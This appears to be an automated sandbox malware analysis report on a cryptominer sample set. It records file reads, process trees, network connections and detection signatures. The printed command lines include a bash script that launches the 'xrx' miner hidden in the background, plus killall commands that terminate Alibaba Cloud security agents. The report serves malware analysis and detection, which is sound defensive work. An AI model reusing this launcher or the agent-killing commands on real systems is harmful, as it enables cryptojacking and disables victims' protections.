File opened for reading /proc/83/cmdline /usr/bin/pidof N/A
File opened for reading /proc/97/stat /usr/bin/pidof N/A
File opened for reading /proc/630/stat /usr/bin/pidof N/A
File opened for reading /proc/96/cmdline /usr/bin/pidof N/A
File opened for reading /proc/162/cmdline /usr/bin/pidof N/A
File opened for reading /proc/210/stat /usr/bin/pidof N/A
File opened for reading /proc/262/stat /usr/bin/pidof N/A
File opened for reading /proc/534/stat /usr/bin/pidof N/A
File opened for reading /proc/self/maps /usr/bin/grep N/A
File opened for reading /proc/4/cmdline /usr/bin/pidof N/A
File opened for reading /proc/8/cmdline /usr/bin/pidof N/A
File opened for reading /proc/1253/cmdline /usr/bin/pidof N/A
File opened for reading /proc/858/stat /usr/bin/pidof N/A
File opened for reading /proc/1169/cmdline /usr/bin/pidof N/A
File opened for reading /proc/1231/stat /usr/bin/pidof N/A
File opened for reading /proc/83/stat /usr/bin/pidof N/A
File opened for reading /proc/92/stat /usr/bin/pidof N/A
File opened for reading /proc/224/stat /usr/bin/pidof N/A
File opened for reading /proc/1282/stat /usr/bin/pidof N/A
File opened for reading /proc/1440/stat /usr/bin/pidof N/A
File opened for reading /proc/9/stat /usr/bin/pidof N/A
File opened for reading /proc/11/cmdline /usr/bin/pidof N/A
File opened for reading /proc/15/cmdline /usr/bin/pidof N/A
File opened for reading /proc/851/stat /usr/bin/pidof N/A
File opened for reading /proc/993/stat /usr/bin/pidof N/A
File opened for reading /proc/2/stat /usr/bin/pidof N/A
File opened for reading /proc/218/cmdline /usr/bin/pidof N/A
File opened for reading /proc/667/stat /usr/bin/pidof N/A
File opened for reading /proc/1056/cmdline /usr/bin/pidof N/A
File opened for reading /proc/1107/stat /usr/bin/pidof N/A

Processes

/tmp/xrx/init.sh

[/tmp/xrx/init.sh]

/bin/bash

[/tmp/xrx/init.sh -c exec '/tmp/xrx/init.sh' "$@" /tmp/xrx/init.sh]

/tmp/xrx/init.sh

[/tmp/xrx/init.sh]

/bin/bash

[/tmp/xrx/init.sh -c #!/bin/bash if [[ $(cat config.json | grep xxcountxx) ]]; then echo "configuring miner" sed -i "s/xxcountxx/$(nproc)/g" config.json else echo "using preconfigured miner" fi PID=$(pidof xrx) if [ $# -eq 0 ]; then ##if no arguments if [ -z "${PID}" ]; then ./xrx </dev/null &>/dev/null & disown -h %1 echo "miner online" else echo "miner already online" fi fi /tmp/xrx/init.sh]

/usr/bin/grep

[grep xxcountxx]

/usr/bin/cat

[cat config.json]

/usr/bin/pidof

[pidof xrx]

/tmp/xrx/xrx

[./xrx]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp

Files

N/A

Analysis: behavioral20

Detonation Overview

Submitted

2024-11-26 12:41

Reported

2024-11-26 12:44

Platform

debian9-armhf-20240611-en

Max time kernel

141s

Command Line

[/tmp/xrx/scp]

Signatures

N/A

Processes

/tmp/xrx/scp

[/tmp/xrx/scp]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

Network

N/A

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-26 12:41

Reported

2024-11-26 12:44

Platform

ubuntu2404-amd64-20240523-en

Max time kernel

0s

Max time network

132s

Command Line

[/tmp/样本/Linux/shc加密脚本/42693670C71A529A11E81943F5B36C5B]

Signatures

Enumerates running processes

Reads runtime system information

discovery
Description Indicator Process Target

Processes

/tmp/样本/Linux/shc加密脚本/42693670C71A529A11E81943F5B36C5B

[/tmp/样本/Linux/shc加密脚本/42693670C71A529A11E81943F5B36C5B]

/bin/bash

[/tmp/样本/Linux/shc加密脚本/42693670C71A529A11E81943F5B36C5B -c exec '/tmp/样本/Linux/shc加密脚本/42693670C71A529A11E81943F5B36C5B' "$@" /tmp/样本/Linux/shc加密脚本/42693670C71A529A11E81943F5B36C5B]

/tmp/样本/Linux/shc加密脚本/42693670C71A529A11E81943F5B36C5B

[/tmp/样本/Linux/shc加密脚本/42693670C71A529A11E81943F5B36C5B]

/bin/bash

[/tmp/样本/Linux/shc加密脚本/42693670C71A529A11E81943F5B36C5B -c #!/bin/bash if [[ $(cat config.json | grep xxcountxx) ]]; then echo "configuring miner" sed -i "s/xxcountxx/$(nproc)/g" config.json else echo "using preconfigured miner" fi PID=$(pidof xrx) if [ $# -eq 0 ]; then ##if no arguments if [ -z "${PID}" ]; then ./xrx </dev/null &>/dev/null & disown -h %1 echo "miner online" else echo "miner already online" fi fi /tmp/样本/Linux/shc加密脚本/42693670C71A529A11E81943F5B36C5B]

/usr/bin/cat

[cat config.json]

/usr/bin/grep

[grep xxcountxx]

/usr/bin/pidof

[pidof xrx]

/tmp/样本/Linux/shc加密脚本/xrx

[./xrx]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp

Files

N/A

Analysis: behavioral19

Detonation Overview

Submitted

2024-11-26 12:41

Reported

2024-11-26 12:44

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

140s

Max time network

130s

Command Line

[/tmp/xrx/scp]

Signatures

N/A

Processes

/tmp/xrx/scp

[/tmp/xrx/scp]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

(the /dev/shm/.x/secure and sleep 10 process pair above is recorded 15 times in succession in this trace)

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
GB 185.125.188.61:443 tcp
GB 185.125.188.61:443 tcp
US 151.101.1.91:443 tcp
US 151.101.1.91:443 tcp
GB 89.187.167.7:443 tcp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
GB 84.17.50.9:443 1527653184.rsc.cdn77.org tcp

Files

N/A

Analysis: behavioral24

Detonation Overview

Submitted

2024-11-26 12:41

Reported

2024-11-26 12:44

Platform

ubuntu1804-amd64-20240729-en

Max time kernel

0s

Max time network

131s

Command Line

[/tmp/xrx/uninstall.sh]

Signatures

Enumerates running processes

Reads runtime system information

discovery
Description Indicator Process Target

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/killall N/A

Processes

/tmp/xrx/uninstall.sh

[/tmp/xrx/uninstall.sh]

/bin/grep

[grep Gentoo]

/usr/bin/lsb_release

[lsb_release -a]

/usr/local/sbin/dpkg-query

[dpkg-query -f ${Version} ${Provides} -W lsb-core lsb-cxx lsb-graphics lsb-desktop lsb-languages lsb-multimedia lsb-printing lsb-security]

/usr/local/bin/dpkg-query

[dpkg-query -f ${Version} ${Provides} -W lsb-core lsb-cxx lsb-graphics lsb-desktop lsb-languages lsb-multimedia lsb-printing lsb-security]

/usr/sbin/dpkg-query

[dpkg-query -f ${Version} ${Provides} -W lsb-core lsb-cxx lsb-graphics lsb-desktop lsb-languages lsb-multimedia lsb-printing lsb-security]

/usr/bin/dpkg-query

[dpkg-query -f ${Version} ${Provides} -W lsb-core lsb-cxx lsb-graphics lsb-desktop lsb-languages lsb-multimedia lsb-printing lsb-security]

/bin/grep

[grep Gentoo]

/bin/cat

[cat /etc/issue]

/usr/bin/killall

[killall -9 aegis_cli]

/usr/bin/killall

[killall -9 aegis_update]

/usr/bin/killall

[killall -9 AliYunDun]

/usr/bin/killall

[killall -9 AliHids]

/usr/bin/killall

[killall -9 AliHips]

/usr/bin/killall

[killall -9 AliYunDunUpdate]

Network

Country Destination Domain Proto
US 151.101.1.91:443 tcp
GB 185.125.188.62:443 tcp
GB 185.125.188.62:443 tcp
US 1.1.1.1:53 ocp-ingress.fastly.gnome.org udp
US 151.101.1.91:443 ocp-ingress.fastly.gnome.org tcp
GB 84.17.50.8:443 tcp
N/A 224.0.0.251:5353 udp

Files

N/A

Analysis: behavioral12

Detonation Overview

Submitted

2024-11-26 12:41

Reported

2024-11-26 12:44

Platform

debian9-mipsel-20240611-en

Max time kernel

3s

Command Line

[/tmp/样本/Linux/sh恶意脚本/E4CC1A7F992909E8509520FDD6C9A3F7]

Signatures

Enumerates running processes

Reads runtime system information

discovery
Description Indicator Process Target

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/killall N/A

Processes

/tmp/样本/Linux/sh恶意脚本/E4CC1A7F992909E8509520FDD6C9A3F7

[/tmp/样本/Linux/sh恶意脚本/E4CC1A7F992909E8509520FDD6C9A3F7]

/bin/grep

[grep Gentoo]

/bin/grep

[grep Gentoo]

/bin/cat

[cat /etc/issue]

/usr/bin/killall

[killall -9 aegis_cli]

/usr/bin/killall

[killall -9 aegis_update]

/usr/bin/killall

[killall -9 AliYunDun]

/usr/bin/killall

[killall -9 AliHids]

/usr/bin/killall

[killall -9 AliHips]

/usr/bin/killall

[killall -9 AliYunDunUpdate]

Network

N/A

Files

N/A

Analysis: behavioral13

Detonation Overview

Submitted

2024-11-26 12:41

Reported

2024-11-26 12:44

Platform

ubuntu2204-amd64-20240729-en

Max time kernel

0s

Max time network

131s

Command Line

[/tmp/样本/Linux/挖矿程序/9D099882A24757AC5033B0C675FECBE5]

Signatures

Xmrig_linux family

xmrig_linux

xmrig

miner xmrig_linux

Processes

/tmp/样本/Linux/挖矿程序/9D099882A24757AC5033B0C675FECBE5

[/tmp/样本/Linux/挖矿程序/9D099882A24757AC5033B0C675FECBE5]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp

Files

N/A

Analysis: behavioral15

Detonation Overview

Submitted

2024-11-26 12:41

Reported

2024-11-26 12:44

Platform

win10v2004-20241007-en

Max time kernel

148s

Max time network

154s

Command Line

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\1AAF1A9F7877DC2C899D910A52F67F31.tar"

Signatures

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zFM.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A

Processes

C:\Program Files\7-Zip\7zFM.exe

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\1AAF1A9F7877DC2C899D910A52F67F31.tar"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 140.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 100.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp

Files

N/A